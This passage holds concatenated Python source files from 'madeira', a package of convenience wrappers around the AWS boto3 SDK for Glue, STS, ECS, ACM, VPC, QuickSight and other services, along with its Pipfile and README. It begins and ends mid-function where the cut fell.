self.glue_client.exceptions.EntityNotFoundException: self._logger.warning('Database does not exist: %s', database) return False def delete_job(self, job): return self.glue_client.delete_job(JobName=job) def delete_table(self, database, table): try: self._logger.info('Deleting glue table: %s', table) return self.glue_client.delete_table(DatabaseName=database, Name=table) except self.glue_client.exceptions.EntityNotFoundException: self._logger.warning('Either database: %s or 
table: %s does not exist', database, table) return False def list_jobs(self): # get the largest chunk possible according to AWS API limits max_results = 100 glue_jobs = list() self._logger.debug('Reading first chunk of glue jobs') glue_job_chunk = self.glue_client.list_jobs( MaxResults=max_results ) glue_jobs.extend(glue_job_chunk.get('JobNames')) while glue_job_chunk.get('NextToken'): self._logger.debug('Reading next chunk of glue jobs') glue_job_chunk = self.glue_client.list_jobs( NextToken=glue_job_chunk.get('NextToken'), MaxResults=max_results ) glue_jobs.extend(glue_job_chunk.get('JobNames')) return glue_jobs def list_tables(self, database): try: return self.glue_client.get_tables(DatabaseName=database, MaxResults=999).get('TableList') except self.glue_client.exceptions.EntityNotFoundException: return [] <file_sep>import configparser import os import uuid from madeira import session from madeira_utils import loggers class Sts(object): def __init__(self, logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() self._session = session.Session(profile_name=profile_name, region=region) self.sts_client = self._session.session.client("sts") # for convenience sts_caller_identity = self.sts_client.get_caller_identity() self.account_id = sts_caller_identity.get("Account") self.user_arn = sts_caller_identity.get("Arn") self.user_id = sts_caller_identity.get("UserId") def get_access_keys(self, duration=3600): token = self.sts_client.get_session_token(DurationSeconds=duration).get( "Credentials" ) return ( token.get("AccessKeyId"), token.get("SecretAccessKey"), token.get("SessionToken"), ) def write_role_credentials(self, aws_profile, role_arn, role_session_name=None, duration=None): role_session_name = role_session_name if role_session_name else uuid.uuid4().hex creds = self.sts_client.assume_role( RoleArn=role_arn, RoleSessionName=role_session_name, DurationSeconds=duration) aws_creds_file = 
os.path.expanduser("~/.aws/credentials") # update the AWS credentials file config = configparser.ConfigParser() config.read(aws_creds_file) if aws_profile not in config: config[aws_profile] = {} config[aws_profile] = { "region": "us-east-1", "aws_access_key_id": creds["Credentials"]["AccessKeyId"], "aws_secret_access_key": creds["Credentials"]["SecretAccessKey"], "aws_session_token": creds["Credentials"]["SessionToken"], } with open(aws_creds_file, "w") as configfile: config.write(configfile) <file_sep>[[source]] name = "pypi" url = "https://pypi.org/simple" verify_ssl = true [dev-packages] madeira-utils-editable = {path = "./../madeira-utils",editable = true} [packages] madeira = {path = ".",editable = true} [requires] python_version = "3.8" <file_sep>from madeira import session, sts from madeira_utils import loggers class Ecs(object): def __init__(self, logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() self._session = session.Session(logger=logger, profile_name=profile_name, region=region) self._sts = sts.Sts(logger=logger, profile_name=profile_name, region=region) self.ecs_client = self._session.session.client("ecs") def list_tasks(self, cluster): tasks = self.ecs_client.list_tasks(cluster=cluster).get('taskArns') if not tasks: return [] return self.ecs_client.describe_tasks( cluster=cluster, tasks=tasks).get('tasks') def stop_tasks(self, cluster, tasks, reason=''): results = [] for task in tasks: self._logger.info('Stopping task: %s', task['taskArn']) self._logger.info(' Container name(s): %s', ','.join( [container['name'] for container in task['containers']])) results.append( self.ecs_client.stop_task(cluster=cluster, task=task['taskArn'], reason=reason)) return results <file_sep>from madeira import session from madeira_utils import loggers class ElbV2(object): def __init__(self, logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() self._session = 
session.Session(logger=logger, profile_name=profile_name, region=region) self.elbv2_client = self._session.session.client('elbv2') def disable_termination_protection(self, arn): return self.elbv2_client.modify_load_balancer_attributes( LoadBalancerArn=arn, Attributes=[{'Key': 'deletion_protection.enabled', 'Value': 'false'}] ) def get_load_balancer_fqdn(self, name): return self.elbv2_client.describe_load_balancers(Names=[name])['LoadBalancers'][0]['DNSName'] def list_load_balancers(self): return self.elbv2_client.describe_load_balancers().get('LoadBalancers') <file_sep>import time from madeira import session from madeira_utils import loggers class Acm(object): def __init__(self, logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() self._session = session.Session(logger=logger, profile_name=profile_name, region=region) self.acm_client = self._session.session.client('acm') self._max_status_checks = 20 self._status_check_interval = 20 def delete_cert_by_domain_name(self, domain_name): cert = self.get_cert_by_domain(domain_name) if not cert: self._logger.warning("No ACM certificate exists for domain: %s", domain_name) return self._logger.info("Deleting certificate for domain: %s with ARN: %s", domain_name, cert['CertificateArn']) return self.acm_client.delete_certificate(CertificateArn=cert['CertificateArn']) def get_cert_by_domain(self, domain_name): for cert in self.acm_client.list_certificates().get('CertificateSummaryList'): if cert['DomainName'] == domain_name: return cert return {} def get_cert_dns_validation_meta(self, certificate_arn): return self.acm_client.describe_certificate(CertificateArn=certificate_arn).get('Certificate').get( 'DomainValidationOptions')[0].get('ResourceRecord') def request_cert_with_dns_validation(self, domain_name): # check if cert has already been requested certificate_arn = self.get_cert_by_domain(domain_name).get('CertificateArn') if certificate_arn: self._logger.info('Certificate 
with domain: %s has already been requested', domain_name) else: self._logger.info('Requesting ACM cert with domain name: %s', domain_name) certificate_arn = self.acm_client.request_certificate( DomainName=domain_name, ValidationMethod='DNS').get('CertificateArn') self._logger.info('Waiting for DNS validation meta to propagate') # TODO: something more intelligent than time.sleep time.sleep(10) self._logger.debug('Got certificate ARN: %s', certificate_arn) return certificate_arn, self.get_cert_dns_validation_meta(certificate_arn) def wait_for_issuance(self, certificate_arn): max_status_checks = 30 status_check_interval = 60 # wait for certificate issuance status_check = 0 self._logger.info('Waiting on ACM certificate issuance confirmation. ' 'This may take up to 30 minutes or longer') while status_check < max_status_checks: status_check += 1 # look for our cert to be in the ISSUED state. for cert in self.acm_client.list_certificates( CertificateStatuses=['ISSUED']).get('CertificateSummaryList'): if cert['CertificateArn'] == certificate_arn: self._logger.info('Certificate: %s is now issued', certificate_arn) return True self._logger.debug('Certificate: %s is not yet issued - waiting', certificate_arn) if status_check >= max_status_checks: raise RuntimeError(f'Timed out waiting for Certificate {certificate_arn} to be issued') time.sleep(status_check_interval) <file_sep>from madeira import session from madeira_utils import loggers class Redshift(object): def __init__(self, logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() self._session = session.Session(logger=logger, profile_name=profile_name, region=region) self.redshift_client = self._session.session.client('redshift') def get_clusters(self): return self.redshift_client.describe_clusters() <file_sep>import time import botocore.exceptions from madeira import session, sts from madeira_utils import loggers class Vpc(object): def __init__(self, logger=None, 
profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() self._session = session.Session(logger=logger, profile_name=profile_name, region=region) self._sts = sts.Sts(logger=logger, profile_name=None, region=None) self.ec2_client = self._session.session.client("ec2") self.ec2_resource = self._session.session.resource("ec2") self._vpc_delete_wait = 30 def _add_name_to_subnets(self, subnets): for subnet in subnets: for tag in subnet.get("Tags"): if tag["Key"] == "Name": self._logger.debug( "Adding subnet name: %s to subnet: %s", tag["Value"], subnet["SubnetId"] ) subnet["Name"] = tag["Value"] def _nat_gateway_status_wait(self, nat_gateway_id, status): max_status_checks = 10 status_check_interval = 20 # wait for stack "final" state status_check = 0 while status_check < max_status_checks: status_check += 1 nat_gateway = self.ec2_client.describe_nat_gateways( Filters=[{"Name": "nat-gateway-id", "Values": [nat_gateway_id]}] ).get("NatGateways")[0] if nat_gateway["State"] == status: self._logger.debug( "NAT gateway %s is now: %s", nat_gateway["NatGatewayId"], status ) return self._logger.debug( "NAT gateway: %s status is: %s - waiting for status: %s", nat_gateway["NatGatewayId"], nat_gateway["State"], status, ) if status_check >= max_status_checks: raise RuntimeError( "Timed out waiting for NAT gateway: %s to be available", nat_gateway["NatGatewayId"], ) time.sleep(status_check_interval) def _peering_connection_wait(self, peering_id): max_status_checks = 20 status_check_interval = 10 # wait for stack "final" state status_check = 0 while status_check < max_status_checks: status_check += 1 try: self.ec2_client.describe_vpc_peering_connections( VpcPeeringConnectionIds=[peering_id]) self._logger.debug("VPC Peering Connection %s is now available", peering_id) break except self.ec2_client.exceptions.ClientError as e: if "InvalidVpcPeeringConnectionID.NotFound" not in str(e): raise if status_check >= max_status_checks: raise RuntimeError( "Timed 
out waiting for VPC peering connection: %s to be available", peering_id, ) self._logger.debug( "VPC peering connection: %s is not yet available - waiting...", peering_id ) time.sleep(status_check_interval) def accept_vpc_peering_connection(self, peering_id, name): self._logger.info( "Accepting peering connection: %s in account: %s", peering_id, self._sts.account_id, ) self._peering_connection_wait(peering_id) self.ec2_client.create_tags( Resources=[peering_id], Tags=[{"Key": "Name", "Value": name}] ) return self.ec2_client.accept_vpc_peering_connection( VpcPeeringConnectionId=peering_id ) def create_and_attach_igw(self, vpc_id): if self.ec2_client.describe_internet_gateways(Filters=[ {'Name': 'attachment.vpc-id', 'Values': [vpc_id]}, ]).get('InternetGateways'): self._logger.info('There is already an internet gateway attached to VPC: %s', vpc_id) return self._logger.info("Creating internet gateway") igw_id = self.ec2_client.create_internet_gateway()["InternetGateway"][ "InternetGatewayId" ] self._logger.info("Attaching internet gateway to VPC") self.ec2_client.attach_internet_gateway(InternetGatewayId=igw_id, VpcId=vpc_id) # add route for igw to VPC default route table self._logger.info("Adding route for internet gateway") self.ec2_client.create_route( DestinationCidrBlock="0.0.0.0/0", GatewayId=igw_id, RouteTableId=self.ec2_client.describe_route_tables( Filters=[{"Name": "vpc-id", "Values": [vpc_id]}] )["RouteTables"][0]["RouteTableId"], ) def create_nat_gw_and_rt(self, vpc_id, name, public_subnet_id, private_subnet_id): if self.ec2_client.describe_nat_gateways( Filters=[ {"Name": "subnet-id", "Values": [public_subnet_id]}, {"Name": "tag:Name", "Values": [name]}, {"Name": "vpc-id", "Values": [vpc_id]}, ] ).get("NatGateways"): self._logger.info( "NAT Gateway: %s using subnet: %s in VPC: %s already exists", name, public_subnet_id, vpc_id, ) return self._logger.info("Allocating elastic IP for NAT gateway") eip_alloc_id = 
self.ec2_client.allocate_address(Domain="vpc").get( "AllocationId" ) self._logger.info("Creating NAT gateway: %s", name) nat_gateway_id = ( self.ec2_client.create_nat_gateway( AllocationId=eip_alloc_id, SubnetId=public_subnet_id ) .get("NatGateway") .get("NatGatewayId") ) self.ec2_client.create_tags( Resources=[nat_gateway_id], Tags=[{"Key": "Name", "Value": name}] ) self._nat_gateway_status_wait(nat_gateway_id, "available") # create a new route table, set up routes self._logger.info("Creating route table") route_table_id = ( self.ec2_client.create_route_table(VpcId=vpc_id) .get("RouteTable") .get("RouteTableId") ) max_status_checks = 20 status_check_interval = 10 # wait for stack "final" state status_check = 0 while status_check < max_status_checks: status_check += 1 try: self.ec2_client.describe_route_tables(RouteTableIds=[route_table_id]) self._logger.debug("Route Table %s is now available", route_table_id) break except self.ec2_client.exceptions.ClientError as e: if "InvalidRouteTableID.NotFound" not in str(e): raise if status_check >= max_status_checks: raise RuntimeError( "Timed out waiting for route_table: %s to be available", route_table_id, ) self._logger.debug( "Route table: %s is not yet available - waiting...", route_table_id ) time.sleep(status_check_interval) self.ec2_client.create_tags( Resources=[route_table_id], Tags=[{"Key": "Name", "Value": name}] ) self._logger.info("Adding internet-facing route") self.ec2_client.create_route( DestinationCidrBlock="0.0.0.0/0", GatewayId=nat_gateway_id, RouteTableId=route_table_id, ) # associate this route table with the given "private" subnet self._logger.info( "Associating route table: %s with private subnet: %s", route_table_id, private_subnet_id, ) self.ec2_client.associate_route_table( RouteTableId=route_table_id, SubnetId=private_subnet_id ) def create_vpc_peer_route(self, cidr_block, route_table_id, vpc_peer_conn_id): try: self._logger.info( "Creating route to CIDR: %s in route table: %s via VPC peering 
connection: %s in account: %s", cidr_block, route_table_id, vpc_peer_conn_id, self._sts.account_id, ) return self.ec2_client.create_route( DestinationCidrBlock=cidr_block, RouteTableId=route_table_id, VpcPeeringConnectionId=vpc_peer_conn_id, ) except self.ec2_client.exceptions.ClientError as e: if "RouteAlreadyExists" in str(e): self._logger.info("Route already exists") return else: raise def create_subnet(self, subnet_name, subnet_cidr, availability_zone, vpc_id): existing_subnets = self.ec2_client.describe_subnets( Filters=[ {"Name": "availability-zone", "Values": [availability_zone]}, {"Name": "cidr-block", "Values": [subnet_cidr]}, {"Name": "vpc-id", "Values": [vpc_id]}, ]).get("Subnets") if existing_subnets: self._logger.info( "Subnet in AZ: %s with CIDR: %s in VPC: %s already exists", availability_zone, subnet_cidr, vpc_id, ) return existing_subnets[0]['SubnetId'] self._logger.info( "Creating subnet: %s with CIDR: %s in AZ: %s", subnet_name, subnet_cidr, availability_zone, ) subnet = self.ec2_client.create_subnet( AvailabilityZone=availability_zone, CidrBlock=subnet_cidr, VpcId=vpc_id ) subnet_id = subnet["Subnet"]["SubnetId"] max_status_checks = 10 status_check_interval = 5 # wait for stack "final" state status_check = 0 while status_check < max_status_checks: status_check += 1 try: subnet = self.ec2_client.describe_subnets(SubnetIds=[subnet_id]).get( "Subnets" )[0] except self.ec2_client.exceptions.ClientError as e: if "InvalidSubnetID.NotFound" not in str(e): raise if subnet["State"] == "available": self._logger.debug("Subnet %s is now available", subnet["SubnetId"]) break self._logger.debug( "Subnet: %s status is: %s - waiting...", subnet["SubnetId"], subnet["State"], ) if status_check >= max_status_checks: raise RuntimeError( "Timed out waiting for subnet: %s to be available", subnet["SubnetId"], ) time.sleep(status_check_interval) self._logger.debug( "Tagging subnet %s with name: %s", subnet["SubnetId"], subnet_name ) self.ec2_client.create_tags( 
Resources=[subnet_id], Tags=[{"Key": "Name", "Value": subnet_name}] ) return subnet_id def create_vpc(self, cidr_block, vpc_name): # if the VPC already exists, return the ID of the extant VPC (if there are many, we're in trouble) vpcs_with_cidr = self.ec2_client.describe_vpcs( Filters=[{"Name": "cidr", "Values": [cidr_block]}] ).get("Vpcs") if vpcs_with_cidr: self._logger.info("VPC with CIDR: %s already exists", cidr_block) return vpcs_with_cidr[0]["VpcId"] self._logger.info("Creating VPC with CIDR: %s", cidr_block) vpc = self.ec2_resource.create_vpc(CidrBlock=cidr_block) self._logger.debug("Waiting for VPC to be available") try: vpc.wait_until_available( Filters=[ {"Name": "state", "Values": ["available"]}, {"Name": "vpc-id", "Values": [vpc.id]}, ] ) # TODO: figure out if there's a client or resource-specific way of doing this so we don't # have to rely on botocore.exceptions. except botocore.exceptions.WaiterError: self._logger.debug("VPC waiter not yet ready - trying again") time.sleep(5) vpc.wait_until_available( Filters=[ {"Name": "state", "Values": ["available"]}, {"Name": "vpc-id", "Values": [vpc.id]}, ] ) vpc.create_tags(Tags=[{"Key": "Name", "Value": vpc_name}]) return vpc.id def create_vpc_peering_connection(self, vpc_id, peer_account_id, peer_vpc_id, name): vpc_peering_connection_id = self.get_vpc_peering_connection_id(vpc_id, peer_account_id, peer_vpc_id) if vpc_peering_connection_id: self._logger.info("VPC peering from %s in account %s to %s in account %s already exists", vpc_id, self._sts.account_id, peer_vpc_id, peer_account_id,) return vpc_peering_connection_id self._logger.info("Requesting VPC peering from %s in account %s to %s in account %s", vpc_id, self._sts.account_id, peer_vpc_id, peer_account_id) # TODO: monitor the status and return peering connection ID once in "pending-acceptance" state vpc_peer_conn_id = self.ec2_client.create_vpc_peering_connection( PeerOwnerId=peer_account_id, PeerVpcId=peer_vpc_id, VpcId=vpc_id 
).get("VpcPeeringConnection").get("VpcPeeringConnectionId") # appears to be only way to name a VPC peering connection as of 2/13/2020 self._peering_connection_wait(vpc_peer_conn_id) self.ec2_client.create_tags(Resources=[vpc_peer_conn_id], Tags=[{"Key": "Name", "Value": name}]) return vpc_peer_conn_id def delete_vpc(self, vpc_id): vpc = self.ec2_resource.Vpc(id=vpc_id) vpc.delete() def deep_delete_vpc(self, vpc_id): # we have to be very comprehensive since there is no way to do a "delete VPC and cascade" operation via # high-level API call. if not vpc_id: return self._logger.info("Deleting VPC child objects") vpc = self.ec2_resource.Vpc(id=vpc_id) if not vpc.id: self._logger.debug("VPC: %s does not exist", vpc_id) return # detach default dhcp_options if associated with the vpc dhcp_options_default = self.ec2_resource.DhcpOptions("default") if dhcp_options_default: dhcp_options_default.associate_with_vpc(VpcId=vpc.id) # delete all NAT gateways associated with the VPC for nat_gw in self.ec2_client.describe_nat_gateways( Filters=[ {"Name": "vpc-id", "Values": [vpc_id]}, { "Name": "state", "Values": ["pending", "failed", "available", "deleting"], }, ] ).get("NatGateways"): self._logger.debug("Deleting NAT gateway: %s", nat_gw["NatGatewayId"]) self.ec2_client.delete_nat_gateway(NatGatewayId=nat_gw["NatGatewayId"]) self._nat_gateway_status_wait(nat_gw["NatGatewayId"], "deleted") # detach and delete all gateways associated with the vpc for gw in vpc.internet_gateways.all(): self._logger.debug("Detaching and deleting Internet gateway: %s", gw.id) vpc.detach_internet_gateway(InternetGatewayId=gw.id) gw.delete() # delete all route table associations for rt in vpc.route_tables.all(): for rta in rt.associations: # delete any associations other than that which denotes a route table is a "main" route table if not rta.main: self._logger.debug("Deleting route table association: %s", rta.id) rta.delete() # delete all route tables for rt in vpc.route_tables.all(): # this has the 
side effect of never deleting the main route table (which gets deleted by virtue of deleting # the VPC / cannot be explicitly deleted by itself) since it always has the "main" association... if not rt.associations: self._logger.debug("Deleting route table: %s", rt.id) rt.delete() # delete our security groups for sg in vpc.security_groups.all(): if sg.group_name != "default": self._logger.debug("Deleting security group: %s", sg.id) sg.delete() # delete any vpc peering connections for vpcpeer in self.ec2_client.describe_vpc_peering_connections( Filters=[{"Name": "requester-vpc-info.vpc-id", "Values": [vpc_id]}] )["VpcPeeringConnections"]: self._logger.debug( "Deleting VPC peering connection: %s", vpcpeer["VpcPeeringConnectionId"] ) self.ec2_resource.VpcPeeringConnection( vpcpeer["VpcPeeringConnectionId"] ).delete() # delete non-default network acls for netacl in vpc.network_acls.all(): if not netacl.is_default: self._logger.debug("Deleting network ACL: %s", netacl.id) netacl.delete() # delete network interfaces for subnet in vpc.subnets.all(): for interface in subnet.network_interfaces.all(): self._logger.debug("Deleting interface: %s", interface.id) interface.delete() self._logger.debug("Deleting subnet: %s", subnet.id) subnet.delete() # release elastic IPs for eip in self.ec2_client.describe_addresses().get("Addresses"): self._logger.debug("Releasing elastic IP: %s", eip["AllocationId"]) self.ec2_client.release_address(AllocationId=eip["AllocationId"]) # finally, delete the vpc self._logger.info("Deleting VPC: %s", vpc_id) vpc.delete() def delete_default_vpc(self): vpc_id = self.get_default_vpc_id() if not vpc_id: self._logger.info("There is no default VPC to delete") return self._logger.info( "Giving some time for deleted default VPC artifacts, if any, to be cleared" ) time.sleep(self._vpc_delete_wait) return self.deep_delete_vpc(vpc_id) def delete_vpc_by_name(self, vpc_name): self.delete_vpc(self.get_vpc_id_by_name(vpc_name)) def delete_vpc_peer_route(self, 
cidr_block, route_table_id): try: self._logger.info( "Deleting route to CIDR: %s in route table: %s in account: %s", cidr_block, route_table_id, self._sts.account_id, ) self.ec2_client.delete_route( DestinationCidrBlock=cidr_block, RouteTableId=route_table_id ) except self.ec2_client.exceptions.ClientError as e: if "InvalidRoute.NotFound" in str(e): self._logger.info(" route does not exist") return raise def enable_dns_hostnames(self, vpc_id): self._logger.info("Enabling DNS hostnames support for VPC %s", vpc_id) self.ec2_client.modify_vpc_attribute( VpcId=vpc_id, EnableDnsHostnames={"Value": True} ) def get_vpc_by_name(self, vpc_name): all_vpcs = self.ec2_client.describe_vpcs( Filters=[{"Name": "tag:Name", "Values": [vpc_name]}] ) for vpc in all_vpcs["Vpcs"]: for tag in vpc["Tags"]: if tag["Key"] == "Name" and tag["Value"] == vpc_name: return vpc return {} def get_vpc_id_by_name(self, vpc_name): return self.get_vpc_by_name(vpc_name).get('VpcId') def get_vpc_peering_connection_id(self, vpc_id, peer_account_id, peer_vpc_id): vpc_peering_conns = self.ec2_client.describe_vpc_peering_connections( Filters=[ {"Name": "accepter-vpc-info.vpc-id", "Values": [peer_vpc_id]}, {"Name": "accepter-vpc-info.owner-id", "Values": [peer_account_id]}, {"Name": "requester-vpc-info.vpc-id", "Values": [vpc_id]}, { "Name": "status-code", "Values": ["pending-acceptance", "active", "provisioning"], }, ] ) if vpc_peering_conns.get("VpcPeeringConnections"): return vpc_peering_conns.get("VpcPeeringConnections")[0].get( "VpcPeeringConnectionId" ) def get_default_vpc_id(self): all_vpcs = self.ec2_client.describe_vpcs() for vpc in all_vpcs["Vpcs"]: if vpc["IsDefault"]: return vpc["VpcId"] return "" def get_route_table_in_vpc(self, name, vpc_id): return ( self.ec2_client.describe_route_tables( Filters=[ {"Name": "vpc-id", "Values": [vpc_id]}, {"Name": "tag:Name", "Values": [name]}, ] ) .get("RouteTables")[0] .get("RouteTableId") ) def get_route_tables_in_vpc(self, vpc_id): return [ 
route_table.get("RouteTableId") for route_table in self.ec2_client.describe_route_tables( Filters=[{"Name": "vpc-id", "Values": [vpc_id]}] ).get("RouteTables") ] def get_main_route_table_by_vpc_id(self, vpc_id): return ( self.ec2_client.describe_route_tables( Filters=[ {"Name": "vpc-id", "Values": [vpc_id]}, {"Name": "association.main", "Values": ["true"]}, ] ) .get("RouteTables")[0] .get("RouteTableId") ) def get_security_group_id(self, vpc_id, name="default"): vpc = self.ec2_resource.Vpc(id=vpc_id) for sg in vpc.security_groups.all(): if sg.group_name == name: return sg.group_id def get_subnet_id_for_az(self, vpc_id, availability_zone): subnets = self.ec2_client.describe_subnets( Filters=[ {"Name": "vpc-id", "Values": [vpc_id]}, {"Name": "availability-zone", "Values": [availability_zone]}, ] ) try: return subnets["Subnets"][0]["SubnetId"] except IndexError: return False def get_subnets_for_az(self, vpc_id, availability_zone): subnets = self.ec2_client.describe_subnets( Filters=[ {"Name": "vpc-id", "Values": [vpc_id]}, {"Name": "availability-zone", "Values": [availability_zone]}, ] ).get("Subnets") self._add_name_to_subnets(subnets) return subnets def get_subnet_ids_for_vpc(self, vpc_id): subnets = self.ec2_client.describe_subnets( Filters=[{"Name": "vpc-id", "Values": [vpc_id]}] ) return [subnet["SubnetId"] for subnet in subnets["Subnets"]] def get_subnets_for_vpc(self, vpc_id): subnets = self.ec2_client.describe_subnets( Filters=[{"Name": "vpc-id", "Values": [vpc_id]}] ).get("Subnets") self._add_name_to_subnets(subnets) return subnets <file_sep>from madeira import session from madeira_utils import loggers class Kms(object): def __init__(self, logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() self._session = session.Session(logger=logger, profile_name=profile_name, region=region) self.kms_client = self._session.session.client('kms') def get_key(self, key_id): return self.kms_client.describe_key(KeyId=key_id) 
def get_key_arn(self, key_id): try: return self.get_key(key_id).get('KeyMetadata').get('Arn') except self.kms_client.exceptions.NotFoundException: return False <file_sep>from madeira import session, sts from madeira_utils import loggers class Iam(object): def __init__(self, logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() self._session = session.Session(logger=logger, profile_name=profile_name, region=region) self._sts = sts.Sts(logger=logger, profile_name=None, region=None) self.iam_client = self._session.session.client("iam") def get_role_arn(self, name): return f"arn:aws:iam::{self._sts.account_id}:role/{name}" <file_sep># Madeira This is a python package which provides wrapper classes and convenience methods for the Amazon Web Servces (AWS) python deployment SDK (`boto3`). In several deployment automation projects I've built over the years, I've found that "bare metal control" over interaction with AWS services allows me to leverage features released by AWS into `boto3` the moment they're available, rather than waiting on 3rd party CM tool authors/vendors to wrap *all* required functionality. Concurrently, this reduces the footprint of project external dependencies. Given that most projects I work on are "pure python", this approach requires less mental context switching compared to using template-driven CM tools. ## Installation This package is hosted on [PyPI](pypi.org), so you may simply: ``` pip install --user madeira ``` ## Support Intended for use with Python 3.7 or later. ## Limitations Not all AWS services are represented; similarly, not all features of AWS services that are represented here are "wrapped". 
## Package name origins Since the AWS python SDK is called `boto`, which refers to Amazon River dolphins, I figured I'd attempt to follow the pattern and name this after a tributary of the Amazon River, given that the point of these wrappers is to deploy objects into AWS, The analogy seemed to solve the problem of developer naming creativity... :stuck_out_tongue_winking_eye:<file_sep>from madeira import session, sts from madeira_utils import loggers import time class Quicksight(object): DASHBOARD_ACTIONS = [ "quicksight:DescribeDashboard", "quicksight:ListDashboardVersions", "quicksight:UpdateDashboardPermissions", "quicksight:QueryDashboard", "quicksight:UpdateDashboard", "quicksight:DeleteDashboard", "quicksight:DescribeDashboardPermissions", "quicksight:UpdateDashboardPublishedVersion", ] DASHBOARD_READER_ACTIONS = [ "quicksight:DescribeDashboard", "quicksight:ListDashboardVersions", "quicksight:QueryDashboard", ] DATA_SET_ACTIONS = [ "quicksight:DescribeDataSet", "quicksight:DescribeDataSetPermissions", "quicksight:PassDataSet", "quicksight:DescribeIngestion", "quicksight:ListIngestions", "quicksight:UpdateDataSet", "quicksight:DeleteDataSet", "quicksight:CreateIngestion", "quicksight:CancelIngestion", "quicksight:UpdateDataSetPermissions", ] DATA_SOURCE_ACTIONS = [ "quicksight:DescribeDataSource", "quicksight:DescribeDataSourcePermissions", "quicksight:PassDataSource", ] TEMPLATE_ACTIONS = ["quicksight:DescribeTemplate"] def __init__(self, logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() self._session = session.Session(logger=logger, profile_name=profile_name, region=region) self._sts = sts.Sts(logger=logger, profile_name=profile_name, region=region) self.quicksight_client = self._session.session.client("quicksight") self._max_status_checks = 20 self._status_check_interval = 5 def _wait_for_data_source_status(self, name, desired_status, max_status_checks=None, status_check_interval=None): max_status_checks 
= max_status_checks if max_status_checks else self._max_status_checks status_check_interval = status_check_interval if status_check_interval else self._status_check_interval # wait for stack "final" state status_check = 0 while status_check < max_status_checks: status_check += 1 data_source = self.quicksight_client.describe_data_source( AwsAccountId=self._sts.account_id, DataSourceId=name).get("DataSource") if data_source["Status"].endswith("FAILED"): self._logger.error( "Data source: %s has known bad status: %s", name, data_source["Status"]) self._logger.error("Error message: %s", data_source["ErrorInfo"]["Message"]) self._logger.error("Please fix the issue and try again.") return False elif data_source["Status"] == desired_status: self._logger.info("Data source: %s deployment complete", name) return True self._logger.debug("Data source: %s status is: %s", name, data_source["Status"]) self._logger.debug("Waiting...") if status_check >= max_status_checks: raise RuntimeError("Timed out waiting for QuickSight Data Source to deploy") time.sleep(status_check_interval) def copy_or_update_analysis_template( self, name, source_template_id, permissions=None, source_account_id=None, max_status_checks=None, status_check_interval=None): source_account_id = source_account_id if source_account_id else self._sts.account_id source_template_arn = (f"arn:aws:quicksight:{self._session.region}:{source_account_id}:" f"template/{source_template_id}") self._logger.debug("Using source template ARN: %s", source_template_arn) args = dict( AwsAccountId=self._sts.account_id, TemplateId=name, Name=name, SourceEntity={"SourceTemplate": {"Arn": source_template_arn}}, ) try: self.quicksight_client.describe_template(AwsAccountId=self._sts.account_id, TemplateId=name) # TODO: use update_template instead / get it working. 
self._logger.info( "Deleting quicksight template: %s from account: %s", name, self._sts.account_id) self.quicksight_client.delete_template(AwsAccountId=self._sts.account_id, TemplateId=name) # self._logger.info('Updating quicksight template: %s from template: %s from account: %s', # name, source_template_id, source_account_id) # result = self._quicksight_client.update_template(**args) # if permissions: # self._logger.info('Updating permissions on quicksight template: %s', name) # self._quicksight_client.update_template_permissions(AwsAccountId=self._sts.account_id, TemplateId=name, # GrantPermissions=permissions) # return result except self.quicksight_client.exceptions.ResourceNotFoundException: pass self._logger.info("Creating quicksight template: %s in account: %s from template: %s from account: %s", name, self._sts.account_id, source_template_id, source_account_id) if permissions: args["Permissions"] = permissions self.quicksight_client.create_template(**args) max_status_checks = (max_status_checks if max_status_checks else self._max_status_checks) status_check_interval = (status_check_interval if status_check_interval else self._status_check_interval) # wait for stack "final" state status_check = 0 template_version = (self.quicksight_client.describe_template( AwsAccountId=self._sts.account_id, TemplateId=name).get("Template").get("Version")) while status_check < max_status_checks: status_check += 1 if template_version["Status"].endswith("FAILED"): errors = ",".join([f"{error['Type']} - {error['Message']}" for error in template_version["Errors"]]) self._logger.error("Template: %s has known bad status: %s", name, template_version["Status"]) self._logger.error("Error message(s): %s", errors) self._logger.error("Please fix the issue and try again.") return False elif template_version["Status"] == "CREATION_SUCCESSFUL": self._logger.info("Template: %s deployment complete", name) return True self._logger.debug("Data source: %s status is: %s", name, 
template_version["Status"]) self._logger.debug("Waiting...") if status_check >= max_status_checks: raise RuntimeError("Timed out waiting for QuickSight template to deploy") time.sleep(status_check_interval) template_version = self.quicksight_client.describe_template( AwsAccountId=self._sts.account_id, TemplateId=name).get("Template").get("Version") version_number = template_version["VersionNumber"] self.quicksight_client.update_template_published_version( AwsAccountId=self._sts.account_id, TemplateId=name, VersionNumber=version_number ) def create_or_update_analysis_template( self, name, source_analysis_id, data_set_references, permissions=None, source_account_id=None): source_account_id = source_account_id if source_account_id else self._sts.account_id source_analysis_arn = (f"arn:aws:quicksight:{self._session.region}:{source_account_id}:" f"analysis/{source_analysis_id}") args = dict( AwsAccountId=self._sts.account_id, TemplateId=name, Name=name, SourceEntity={ "SourceAnalysis": { "Arn": source_analysis_arn, "DataSetReferences": data_set_references, } } ) try: self.quicksight_client.describe_template(AwsAccountId=self._sts.account_id, TemplateId=name) self._logger.info("Updating quicksight template: %s from analysis: %s", name, source_analysis_id) self.quicksight_client.update_template(**args) if permissions: self._logger.info("Updating permissions on quicksight template: %s", name) self.quicksight_client.update_template_permissions( AwsAccountId=self._sts.account_id, TemplateId=name, GrantPermissions=permissions) except self.quicksight_client.exceptions.ResourceNotFoundException: self._logger.info("Creating quicksight template: %s from analysis: %s", name, source_analysis_id) if permissions: args["Permissions"] = permissions return self.quicksight_client.create_template(**args) def create_or_update_dashboard_from_template( self, name, dashboard_id, source_template_id, data_set_references, permissions=None, publish_options=None, source_account_id=None, 
